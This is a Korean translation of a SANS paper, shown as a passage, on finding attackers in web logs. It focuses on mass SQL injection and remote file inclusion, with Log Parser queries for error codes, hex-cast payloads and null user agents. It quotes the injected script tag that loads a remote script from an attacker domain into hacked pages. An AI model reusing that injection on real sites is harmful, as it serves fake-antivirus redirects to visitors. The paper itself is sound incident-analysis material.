웹로그분석을통한공격자식별방법 GIAC GCIA 골드인증 작성자 : Russ McRww, 자문 : Kees Leune 승인 : 2011 년 11 월 16 일 한글본승인 : 2015 년 6 월 5 일 요약관심을가지고웹로그를분석하

Similar documents
Windows 8에서 BioStar 1 설치하기

게시판 스팸 실시간 차단 시스템

PowerPoint Template

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상

Microsoft Word - src.doc

DBMS & SQL Server Installation Database Laboratory

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8

<4D F736F F F696E74202D203137C0E55FBFACBDC0B9AEC1A6BCD6B7E7BCC72E707074>

SIGIL 완벽입문

Windows 10 General Announcement v1.0-KO

로거 자료실

wtu05_ÃÖÁ¾

*2008년1월호진짜

PowerPoint Template

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

Observational Determinism for Concurrent Program Security

Inside Android Applications

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

Microsoft PowerPoint - chap01-C언어개요.pptx

ìœ€íŁ´IP( _0219).xlsx

The Pocket Guide to TCP/IP Sockets: C Version

[Brochure] KOR_TunA

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.

View Licenses and Services (customer)

Visual Studio online Limited preview 간략하게살펴보기

제목 레이아웃

PowerPoint Presentation

Microsoft PowerPoint 웹 연동 기술.pptx

5th-KOR-SANGFOR NGAF(CC)

vRealize Automation용 VMware Remote Console - VMware

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

Microsoft PowerPoint - e pptx

Studuino소프트웨어 설치

기존에 Windchill Program 이 설치된 Home Directory 를 선택해준다. 프로그램설치후설치내역을확인해보면 Adobe Acrobat 6.0 Support 내역을확인할수 있다.

MySQL-.. 1

untitled

untitled

Endpoint Protector - Active Directory Deployment Guide

System Recovery 사용자 매뉴얼


소규모 비즈니스를 위한 플레이북 여기서 다룰 내용은 다음과 같습니다. 1. YouTube 소개 2. YouTube에서 비즈니스를 위한 채널 만들기 3. 눈길을 끄는 동영상 만들기 4. 고객의 액션 유도하기 5. 비즈니스에 중요한 잠재고객에게 더 많이 도달하기

TTA Journal No.157_서체변경.indd

문서 템플릿

Raspbian 설치 라즈비안 OS (Raspbian OS) 라즈베리파이 3 Model B USB 마우스 USB 키보드 마이크로 SD 카드 마이크로 SD 카드리더기 HDM I 케이블모니터

PDF_Compass_32호-v3.pdf

슬라이드 제목 없음

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

Cloud Friendly System Architecture

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

IRISCard Anywhere 5

Secure Programming Lecture1 : Introduction

Microsoft Word - [2017SMA][T8]OOPT_Stage_2040 ver2.docx

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx

Secure Programming Lecture1 : Introduction

6. 설치가시작되는동안 USB 드라이버가자동으로로드됩니다. USB 드라이버가성공적으로로드되면 Setup is starting( 설치가시작되는중 )... 화면이표시됩니다. 7. 화면지침에따라 Windows 7 설치를완료합니다. 방법 2: 수정된 Windows 7 ISO

Windows Live Hotmail Custom Domains Korea

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10

경우 1) 80GB( 원본 ) => 2TB( 복사본 ), 원본 80GB 는 MBR 로디스크초기화하고 NTFS 로포맷한경우 복사본 HDD 도 MBR 로디스크초기화되고 80GB 만큼포맷되고나머지영역 (80GB~ 나머지부분 ) 은할당되지않음 으로나온다. A. Window P

Spotlight on Oracle V10.x 트라이얼프로그램설치가이드 DELL SOFTWARE KOREA

<4D F736F F F696E74202D C61645FB3EDB8AEC7D5BCBA20B9D720C5F8BBE7BFEBB9FD2E BC8A3C8AF20B8F0B5E55D>

Microsoft 을 열면 깔끔한 사용자 중심의 메뉴 및 레이아웃이 제일 먼저 눈에 띕니다. 또한 은 스마트폰, 테블릿 및 클라우드는 물론 가 설치되어 있지 않은 PC 에서도 사용할 수 있습니다. 따라서 장소와 디바이스에 관계 없이 언제, 어디서나 문서를 확인하고 편집

윈도우시스템프로그래밍

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

자연언어처리

1

금오공대 컴퓨터공학전공 강의자료

문서의 제목 나눔고딕B, 54pt

이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론

Microsoft Word - ijungbo1_13_02

슬라이드 1

목차 1. 시스템요구사항 암호및힌트설정 ( 윈도우 ) JetFlash Vault 시작하기 ( 윈도우 ) JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault

#WI DNS DDoS 공격악성코드분석

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.

1. 자바프로그램기초 및개발환경 2 장 & 3 장. 자바개발도구 충남대학교 컴퓨터공학과

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

슬라이드 1

MF Driver Installation Guide

4S 1차년도 평가 발표자료

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

Microsoft PowerPoint - 3장-MS SQL Server.ppt [호환 모드]

슬라이드 1

ISP and CodeVisionAVR C Compiler.hwp

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응

슬라이드 1

쉽게 풀어쓴 C 프로그래밍

리눅스설치가이드 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2.

슬라이드 1

슬라이드 1

WINDOW FUNCTION 의이해와활용방법 엑셈컨설팅본부 / DB 컨설팅팀정동기 개요 Window Function 이란행과행간의관계를쉽게정의할수있도록만든함수이다. 윈도우함수를활용하면복잡한 SQL 들을하나의 SQL 문장으로변경할수있으며반복적으로 ACCESS 하는비효율역

ICAS CADWorx SPLM License 평가판설치가이드

PowerPoint 프레젠테이션

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

EndNote X2 초급 분당차병원도서실사서최근영 ( )

Data Sync Manager(DSM) Example Guide Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager

Transcription:

SANS Institute InfoSec Reading Room 이보고서의영문은 SANS 연구소 Reading Room 사이트에있는것이며, 한글본은 ITL TechNote 사이트에있는것입니다. 이 보고서는문서로허가되지않고서는다른곳에재게시할수없습니다. 웹로그분석을통한공격자식별방법 관심을가지고웹로그를분석하면많은것을알수있다. 본페이퍼에서는이것을인터넷백그라운드방사 (IBR) 라는학술용어의한부분으로저자가인터넷백그라운드공격 (Internet Background Abuse) 이라고정의한다. 스캐닝과잘못된구성을포함한 IBR 스펙트럼의두부분은공격자와피해자가손쉽게. 저작권 SANS 연구소한글본저작권 SANS 코리아작성자가모든권한을가지고있음 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 1

웹로그분석을통한공격자식별방법 GIAC GCIA 골드인증 작성자 : Russ McRww, russ@holisticinfosec.org 자문 : Kees Leune 승인 : 2011 년 11 월 16 일 한글본승인 : 2015 년 6 월 5 일 요약관심을가지고웹로그를분석하면많은것을알수있다. 본페이퍼에서는이것을인터넷백그라운드방사 (IBR) 라는학술용어의한부분으로저자가인터넷백그라운드공격 (Internet Background Abuse) 이라고정의한다. 스캐닝과잘못된구성을포함한 IBR 스펙트럼의두부분은공격자와피해자가손쉽게사용할수있는패턴에대해상세히알리는인터넷백그라운드공격에적용할수있다. 이문서에서는구체적인웹애플리케이션예제를통해공격자와피해자의관점으로부터특성, 트랜드와경향이드러나는공격분석방법및도구사용법에대해다룬다. 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 2

1. 소개 관심을가지고웹로그를분석하면많은것을알수있다. 본연구보고서에서는이것을인터넷백그라운드방사 (IBR) 라는학술용어의한부분으로인터넷백그라운드공격 (Internet Background Abuse) 이라고정의한다. 이문서에서는도구사용옵션과인터넷백그라운드공격 (IBA) 을집중분석할예정이다. IBR은세부분으로나뉠수있다 : 스캐닝, 후방산란및설정오류이다 (Pang, Yegneswaran, Barford, Paxon & Peterson, 2004). 인터넷백그라운드공격에스캐닝과설정오류초점을맞춰적용하면, 스캐닝밴드에서공격자의패턴상세사항을알수있으며, 구성오류밴드에서피해시스템의특성에대한관련정보가노출된다. 본문서에서는 holisticinfosec.org 웹사이트등을대상으로한대량 SQL 인젝션과원격파일포함 (RFI) 웹애플리케이션공격과같은두개의주요공격방식을다룬다. 이문서는공격자와피해자의관점으로부터드러나는특성, 트랜드, 성향과함께인터넷의가장취약한부분을통해귀중한정보를찾아쓰레기통을뒤지는것과유사하다. The Web Application Hacker s Handbook에서정의된 SQL 인젝션은공격자가조작된값을입력하여백엔드데이터베이스와상호작용하는애플리케이션을방해하여데이터베이스서버에애플리케이션또는논리적간섭과명령어를실행하여임의의데이터를검색할수있는취약점이다 (Stuttard, Pinto, 2008). 대량 SQL 인젝션은자동화된 SQL 인젝션공격기법을이용해서몇천또는몇만시스템이짧은기간 ( 일, 주 ) 안에해킹된다. 원격파일포함 (RFI) 공격은 URL을명세하여파일포함취약점을공격하는방법이다. 일부스크립트언어는하나의공통된 API를활용하여로컬파일을열고, 원격 URL을불러오는데여기서공격자가제어하는서버에서파일을검색하는것을통해공격을하는것이다. 나중에데이터가처리되는방법에따라서는피해서버를완전히제어할수있다 (Zalewski, 2012). 특정공격속성에대한웹로그를프로그램적으로파싱후에, 공격및피해사이트를분석하면, 공격자의지리적인위치특징, 피해사이트의공통적인결함및피해분석동안에추가적으로공격가능한발견사항에대한패턴들이드러난다. 준비된로그한세트를이용해서어떤사이트는스캐닝등공격시도만있었고, 어떤사이트는공격이성공하여소스 IP 주소를확인할수있다. 이러한발견사항을통해추가적인공격자의사이트와행위와관련된특정정보를알수있다. 최근신문헤드라인에보복적인해킹단체가개인식별정보와민감한정보를해킹하였다는것을보면공격자의자동화된방법을통해보안설정오류가쉽게발견되어해킹되었는지를이해하는것이굉장히중요하다. 원격파일포함 (RFI) 공격등 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 3

의희생자가되는피해사이트는추가적인웹애플리케이션보안결함및권한오류로인해공격자는해킹후스캐닝역량을확대하고, 피해를확산시킬수있다. 인터넷백그라운드방사리비지티드 (Internet Background Radiation Revisited) 에서논의된학술연구와개념을발전시켜, 이문서는파싱및분석기법과공격자와피해자메트릭과관계된조사방법을다룬다. 도구및실제사례를통해독자들이탐지조치를위해자신들의로그를대상으로사용할수있는방법을배워공격을완화할수있다. 2. 인터넷백그라운드방사및공격 2.1 인터넷백그라운드방사 인터넷백그라운드방사 (IBR) 라는용어는 2004년도에 Characteristics of Internet Background Radiation(Pang, Tegneswaran, Barford, Paxson & Peterson, 2004) 에서처음소개되었다. 이연구는할당되지않은 IP 공간으로가는가치가없는트래픽을분석하기위해과학적으로접근했다. 저자는 백그라운드방사 를후방산란플러딩, 취약점스캔, 웜또는보안설정오류로인해만들어지는무해한트래픽으로구성되는것이라고정의하였다. 인터넷백그라운드방사리비지티드라는추가연구보고서에서는많은비정형적인행위를주소공간의오염으로보고, 보안설정오류를훨씬더많이연구하였다. 비정형행위는종종 네트워크프로토콜취약점, 네트워크서버, 기기, 서비스설정오류, 공격도구설정오류, P2P 네트워크설정오류및다양한다른소프트웨어프로그래밍버그 의결과로언급되었다 (Wustrow, Karir, Bailey, Jahanian & Huston, 2010). 2.2 인터넷백그라운드공격 두개의연구에서악의적인트래픽뿐만아니라, 네트워크서버와서비스설정오류및공격도구설정오류에의해서발생되는할당된 IP 공간으로가는비생산적인트래픽과비정형적인행위를통합할수있는요소들이도출될수있다. 자동화공격을통해전파되는대량 SQL 인젝션공격과 RFI 공격의유사한점을고려할때, 이러한공격은인터넷백그라운드공격으로정의될수있다는것을알수있다. 더간단히설명하면웹애플리케이션으로가는특정한양의트래픽은간단한및지속적인공격적이다. 이문서에서설명하듯이이러한공격은비교적쉽게측정되고분석될수있다. 이문서가작성되는도중에배포된최 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 4

근의 Imperva 연구는이주장을입증했다. Imperva의 Hacker Intelligence Initiative, Monthly Trend Report #9 Automation of Attacks 에서자동화된 SQLi 및 RFI 공격과관련된구체적인통계를보여준다 (Imperva, 2012). 이논문에서는데이터가드러나고, 그결과에서방어적인블랙리스트를만들수있지만, 방법론에관해서는언급되지않았다. 단순한통계를언급하는것보다본연구는방법론및도구를통해유사한분석을수행하고, 웹로그에서이러한통계를도출하한다. 대량 SQL 인젝션과 RFI 공격은인터넷백그아운드공격의주요기여자임에틀림없다. 3. 공격샘플링및분석 3.1 대량 SQL 인젝션공격 최근의 Lilupophilupop과 Nikjju 공격은둘다현재대표적인대량 SQL 인젝션공격의사례이다. Lilupophilupop 공격은 SANS Internet Storm Center Diary에서 Mark Hofman에의하여지난 12월에자세하게잘설명되었다 (Hofman, 2011). 추가적으로 Mark의분석이외에, 이글에는공격을당하고언급한독자들이많은코멘트와답을달았으며일부는로그샘플을제출하였다. 대부분의독자들은 LizaMoon 공격을기억할것이다 ; Lilupophilupop 공격도꽤비슷하다. 두가지의사건에서인젝션된사이트는가짜백신을제공하는곳으로이동하도록리다이렉션하는 URL을제공하였다. 특히, 해킹된사이트에 </title><script src= hxxp://lilupophilupop.com/sl.php ></script> 가포함되어있었으며, sl.php가피해자를 hxxp://ift72hbot.rr.nu와같은곳으로반사시켜악성 AV 사이트로가도록하였다. rr.nu의최상위도메인은몰도바공화국이며, 심각한스팸캠페인뿐만아니라, WordPress 해킹과연루되어있다. 그림 1은전형적으로해킹된것을보여주는피해사이트이다. 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 5

그림 1: Lilupophilupop 피해사이트 피해사이트는대부분 IIS, MS-SQL서버에 ASP, ASP.net 및 ColdFusion이실행되고있었다. Lilupophilupop 공격의특성을파악할수있는것은 IIS 로그에서눈에띄는큰 hex 값이포함되어있다는사실을알았다. 이 hex 내용은다음섹션에서좀더자세히설명할것이다. 이문서의목적을위해포함된 ISC 다이어리독자가제출한 Lilupophilupop 공격로그샘플을이용하여다양한도구로분석할것이다. 이것은자주 D:\logs\lilupophilupop\ex111291anon.log로언급된다. 3.1.1 Log Parser Log Parser는마이크로소프트제품으로 IDS, NetMon 등뿐만아니라 Exchange Server 와 IIS 로그, 윈도우서버이벤트로그의로그파일을분석할수있다. Log Parser는 IIS의로깅메커니즘을시험하기위해 2000년에개발되었다. 복잡하고전문성을띈업무를지원하기위해 Log Parser는 SQL 언어의매우제한된쿼리 를포함하여업데이트했다 (Giuseppinni & Burnett, 2004). 만약시스템 PATH 변수에추가되면, Log Parser는간단하게설치되고명령프롬프트로도잘작동한다. 쿼리는 SQL과같으며간단하게될수도있다. 위에서언급한 ex111201anon.log 로그로에러메시지를뽑아내기위해쿼리는다음과같다 : SELECT EXTRACT_TOKEN(c-ip, 0, ' ') AS IP, EXTRACT_TOKEN(FullUri, 0, ' ') AS Uri, EXTRACT_TOKEN(csuriquery, -1, ' ') AS ErrorMsg, COUNT(*) AS Total USING STRCAT( cs-uri-stem, REPLACE_IF_NOT_NULL(cs-uri-query, STRCAT('?', cs-uri-query))) AS FullUri FROM D:\logs\lilupophilupop\ex111201anon.log WHERE (sc-status = 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 6

500) AND (cs-uri-stem LIKE '%.asp') AND (ErrorMsg LIKE %lilupophilupop%') GROUP BY IP, Uri, ErrorMsg ORDER BY Total DESC TO errorresults.log SQL 인젝션공격을분석할때 HTTP 프로토콜 500번오류 ( 내부서버오류 ) 인웹로그를확인하는것이유익하다. HTTP 프로토콜 500번에러는 SQL 인젝션공격에의해생긴조사경로를바르게잡은것이다. a.sql 파일로저장된위의쿼리는다음과같은명령을실행하면, 출력값은 TSV 포맷으로저장된다. logparser -o:tsv file:asp_app_errors_lilupophilupop.sql IIS 로그의분석할때쿼리의몇몇주요엘리먼트를이해하는것이중요하다. 이쿼리에서나타나는 IIS 로그필드는 request를받는프록시서버나클라이언트의 IP 주소 (c-ip), 서버의접근된리소스 (cs-uri-stem), URI의쿼리문자열부분내용 (cs-uri-query), 그리고클라이언트가받는결과코드 (sc-status) 를포함한다. 사용자나프록시서버를확인할수있는 c-ip, 공격범위를확인할수있는 cs-uri-stem, 악의적인데이터의삽입을확인할수있는 cs-uri-query, 그리고 CGI 스캔, SQL 인젝션, 다른침입을확인할수있는 sc-status는포렌식관점에서유용한것들이다 (Burnett, 2010). 3.1.2 Log Parser Lizard Log Parser Lizard(LPL) 은 1998년에 Lizard Lab을설립한개발자이자마케도니아소프트웨어엔지니어인 Dimce Kuzmanov의아이디어다. Dimce는 ISSA 저널에서 2012년 4월의툴스미스칼럼을위한이메일인터뷰에서발견한많은정보를제공했다 (McRee, 2012). 2006 년에또한금융시스템의시스템관리자로서파트타임으로일하고있을때, Log Parser를이용하여일일기반으로보고서를만들고, 로그를분석하고, 에러리포팅을자동화하고 txt 파일과함께데이터를전송하였다. 시간이지나면서수많은쿼리가처리및유지하기힘들어졌고, 스스로가무료소프트웨어로부터혜택을받았기때문에, 그는개인적인용도를위한 LPL을만들었고, 커뮤니티에돌려주기위해유용한프리웨어제품으로발표하길원했다. LPL이성공적으로 Log Parser 의기능을잘이용함에따라, 개발자는 LPL을이용해서훌륭한 UI로학습과적은노력으로쿼리를구성할수있었다. LPL에 log4net과정규식입력지원이추가되면서 Log Parser 커뮤니티는 LPL을받아들이기시작했다. 이따금발생하는 LPL 릴리즈는보통약간의새로운기 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 7

능과버그또는코드를수정하는것을기본으로하고, 향후버전은계획되었으나, 주기적으 로발표되지않는다. 오늘날 LPL 은지난 3 년동안트랜드분석에기초로하여한달에약 2000 건설치와거의전세계적으로 80,000 명의사용자를가지고있다. LPL 의최근제품릴리즈는 2.1 이고다음과같은기능을포함하고있다 : - 소스검색및분석기능, 신택스 (Syntax) 하이라이팅기능, 자동소스코드완성, 메소드인사이트언두 / 리두, 북마크등소스코드편집기능을강화하여쿼리구성기능 - 페이스북쿼리언어 (FQL) 지원. 이기능은페이스북개발자들이그들의쿼리를관리하는것을돕기위해도입되었다. - 코드정보 ( 코드템플릿 ) 와정수. Log Parser Lizard는또한마이크로소프트. Net에서의 static/shared 특성을묶은 constants 를지원한다. - 마이크로소프트오피스설치를요구하는것없이차트를지원할뿐만아니라필터링과그룹핑과개선된그리드등다양한사용자인터페이스기능 - 등록된사용자에게엑셀과 PDF 문서로결과를내보내고인쇄하는것을지원한다. - LogParser SQL 쿼리를만들수있는인라인 VB.net 코드를지원한다. - 인라인 VB.net 지원으로인해 <% 와 %> 기호사이에코드를떨어뜨릴수있다 ; 즉 VB.net이실행되고, 결과문자열은쿼리에서위치한다. Lizard Labs은이기능이 LPL 사용자들을위해매우유용하다고생각하고있다. 로그를파싱하기전에당신은파일을이동-복사- 이름바꾸기, FTP를통해다운로드, IIS 중단등을할수있다. 당신은또한쿼리파라미터에서산술연산및시스템환경설정을위한 DateTime과같은.NET 데이터타입을사용할수있다. 본연구에서는 LPL 2.5 베타버전을이용하였다. 이버전의새로운기능은다음과같다. - 필수정보를확인하기위해조건부의필드포맷 ( 색깔, 글꼴, 크기, 이미지 ). 예를들면, 당신은에러 (error) 색깔은빨간색, 경고 (warning) 색깔은노란색등으로조건을변경해서설정할수있다. 또는만약흥미로운문자열의값을포함한다면특정필드를강조한다. - 데이터베이스스토리지가허용하는검사, 백업, 감사뿐만아니라조직의다중사용자와컴퓨터들사이에용이성을위한 SQL 서버데이터베이스안에서쿼리를저장하고만들수있다. 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 8

- 엑셀스타일의열필터링 - 엑셀스타일 ( 대부분의엑셀기능 ) 함수와칼럼을추가하고엑셀 2007 포맷 (65365 열 이상 ) 에서의내보내기를지원기능 향후 LPL 에는 IIS 웹보고서 ( 다른상용로그분석제품등 ) 를위한비정형쿼리, 쿼리실행스케줄링지원, LPL으로부터이메일을통해보고서를받고, 명령어라인지원, 쿼리빌더도구, 텍스트파일입력값포맷 ( 하나의파일이어디있든지하나의레코드와필드는 LogParser 함수나 RegEx와함께뽑아낼수있다 ), 그리고 log4net 입력값포맷개선하는기능이추가될것이다. 다시, ISC 독자들이제출한위에서언급된로그파일을이용하여 LPL에포함된기본쿼리로부터 ASP 애플리케이션에러를찾기위해쿼리를만들었다. LPL을실행하기위해, ASP App Errors에서 IIS Logs를클릭하고, FROM 구문에있는 #IISW3C# 이타겟로그파일경로로대체하고, 그림 2에서보여지는것과같이 Run Query를클릭한다. 로그파일이필요하면저자의이메일주소 ( 푸터에서 ) 를통해요청하면시험해볼수있다 ( 이메일주소 : russ@holisticinfosec.org) 그림 2: LPL 파싱에러메시지 Lilupophilupop 이나 URL 인젝션에대해서사전에지식이없어도, FROM D:\logs\lilupophilupop\ex111201anon.log WHERE (sc-status = 500) AND (cs-uri-stem LIKE '%.asp') 이포함된이쿼리는즉시검색벡터를좁혀준다. 또한이공격에서공통점은로그에서보이는 DECLARE 선언 ( 변수정의 ) 이될수도있다. 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 9

그림 3 에서보여주는쿼리는 CAST( 하나의데이터타입표현을다른것으로변환 ) 선언뒤에 DECLARE 선이이포함된세개의결과가나왔다. 여기서벡앤드로 hex 값을전달하기위한 시도가있었다는것을알수있다. 그림 3: LPL 파싱으로나온 DECLARE 선언 78.46.28.97의결과에서알수있듯이큰 hex 문자열이분명하다. LPL 사용자들은 SELECT ALL을선택하고그리고 COPY, 그리고텍스트편집기에내용을붙여넣기할수있다. CAST 선언바로뒤부터 AS VARCHAR 선언앞까지의 Hex를복사하여, Burp Suit 디코더창안에붙여넣기하고아스키 hex로디코딩을선택한다 (Stuttard, 2011.). 파이어폭스애드온인 HackBar도 hex 디코딩기능을제공한다. 그림 4는변환된공격문자열을보여준다. 그림 4: hex 를변환한 Burp 디코더 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 10

Lilupophilupop 공격은 모든 테이블 안에 모든 칼럼을 통하여 순환하면서 hxxp://liupophilupop.com/sl.php 지점으로 자바스크립트를 추가하여 자신들의 값으로업데이트시도한다. 짧은시간안에 LPL과약간의경험을가지고공격패턴이명확하게확인되고 분석되었다. 이것은섹션 3.1.1에서도언급했듯이이결과는 Log Parser 명령어라인에서도 수행될수있다. 하지만 LPL을이용하면강력한쿼리관리기능과차트가포함된잘정돈된 보고서를만들수있는등편리하다. The Computer Forensics and Incident Response 블로그에서포스팅한 Computer Forensics How-To: Microsoft Log Parser(Tilbury, 2011) 은 Log Parser Lizard 사용시훌륭한참고가된다. 3.1.3 Log Parser Studio Log Parser Studio 는라이브러리쿼리관리기능을업데이트 ( 많은유용한빌트인 쿼리들을포함하여 ) 하여동시에 100 개이상의쿼리를실행하는기능을추가하고 Log Parser Lizard 가현재분석할수없는몇몇사용자정의로그타입을위해지원하는기능을 추가하였다. Log Parser Studio 는또한배치작업및자동화가가능하다. 설치및사용은간단하다. 설치가되면, 폴더아이콘 ( 쿼리의로그파일 / 폴더선택 ) 을 클릭하고분석대상로그파일을선택한다. D:\logs\lilupophilupop\ex111201anon.log 로 계속하면, Log Parser Studio 를이용해서봇이나자동프로그램이사용되었는지알기위해 공격한소스 IP 주소로부터사용자에이전트개체를분석하였다. Log Parser Studio 라이브러리에서사용자들은 IIS 로그에대해 IIS: User-Agent Report 등많은쿼리가 준비되어있다. ex111201anon.log 를대상으로 SELECT distinct cs(user-agent), count(*) as hits FROM [LOGFILEPATH] GROUP BY cs(user-agent) ORDER BY hits DESC 쿼리를실행하면, 1,766 개의서로다른사용자에이전트문자열이나온다. 이결과는 Lilupophilupop 공격에관계된것과는반대로모든로그전체에대한것으로, 노이즈 - 신호 비율을향상하기위해쿼리를수정하였다. 사용자에이전트와관련하여널 (Null) 사용자에이전트문자열을찾는쿼리도있다. 앞에서해본것처럼 500 번에러를검색하는것과같이하면, 결과는공격이나타난다 ; 이 경우는명확한 Lilupophilupop 공격이다. SELECT * FROM [LOGFILEPATH] WHERE cs(user-agent)=null AND sc-status=500 으로부터의쿼리결과는그림 5 에서 보여지는것과같다. 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 11

그림 5: 널사용자에이전트를통해발견된 Lilupophilupop 3.1.4 대량 SQL 인젝션분석과통계대량 SQL 인젝션공격을하면대규모의피해가발생한다. Lilupophilupop 공격의절정후 2012년 1월 15일에도여전히 1,170,000 사이트가해킹되었다. 그러나검색엔진쿼리를통해수집된통계이기때문에, 직접적으로해킹을나타내는것보다 Lilupophilupop 에대해참고를포함하는결과일가능성을반드시고려해야한다. 이벤트의홀수차례에, 그림 6에서보여지는것처럼 Lilupophilupop 피해의국가통계에서, 네덜란드가최고국가로나타난다. 그림 6 왜 55만개이상의결과에네덜란드에속해있는지는명확하지않지만수많은하위도메인이있는단하나의도메인이해킹되었으며, ></title><script src= hxxp://lilupophilupop.com/sl.php ></script> 가데이터베이스에서광범위하게쓰였고그래서과도하게페이지카운트가포함되었다. 이이론을지원하는예제는 2012년 5월 9일에남아있다. 그림 7에서보여지는것처럼도메인 vakantieland.nl은서브도메인뒤에서브도메인과함께쌓여지고 Lilupophilupop 문자열이삽입된많은레퍼런스를보여주었다. 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 12

그림 7: 공격문자열에서의 NL 결과 제대로관리되지않는 ASP 프로그램은확실히대량 SQL 인젝션공격을쉽게당할 수있다. 그림 8 과같이않는 Air Free Tires(http://www.airfreetires.com/default.asp) 와같이 사이트는타이어쇼핑사이트로추천하지않는다고하는것이안전하다. 그림 8: ASP 플랫타이어 이는 ASP만의문제는아니며, ColdFusion 사이트는또한쉽게피해를당했다. 2012년 5월 9일까지 ></title><script src=http://lilupophilupop.com/sl.php ></script> ext:cfm을포함하는검색퀴리에서여전히나타난다. Lilupophilupop에피해를입고있다는직접적인증거가있는사이트들이없지만, 피해사이트중의하나의조작된 request로인해다른오류에서 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 13

SELECT L.MetaDescription, L.MetaKeywords FROM Laender L WHERE LandID=1 이라는결과가나왔다. 이것은 SQL 인젝션취약점이있다는말이다. ASP.net 또한잊지말자. JS/Redirector 탐지로나오는 http://forum.viverjsb.com/yaf_postsm36_jsb--clipping-micro-geracao-jornal-negocios.aspx URL로인해여전히그림 9에서보여지는것처럼 JS/Redirecto 로탐지되었다. 그림 9: Lilupophilupopped forum.viverjsb.com에대해서소스코드검토결과, HTML HEAD 요소뿐만아니라많은 TABLE과 SPAN 레퍼런스에서 Lilupophilupop 문자열이인젝션되었다. 이것은대량 SQL이인젝션된사이트에누가방문하는지는토론해볼가치가있다. Lilupophilupop과 Nikjju 공격은둘다피해자들에게백신제공을속이는것이다. Nikjju 공격 ( 계속해서진행중임 ) 은다수의도메인을포함하고있으며, 잘문서화된 Lizamoon 공격을수행한동일단체의소행이다. 모든 Nikjju 도메인은 AS42926 또는 Radore Hosting 부분으로 31.210.100.242를가르킨다. 이부분은다시논의될것이다. 이단체에서생성하고, 대량의 SQL 인젝션을통해인젝션된공통 URL *.com/r.php가반드시포함하고있다 (Danchev, 2012). 그림 10에서보여주는검색결과와같이공격자를검색해본결과 http://fail-safetyperfomancecenter.info/68efd410a6a48b3c/1/ 로나온다. 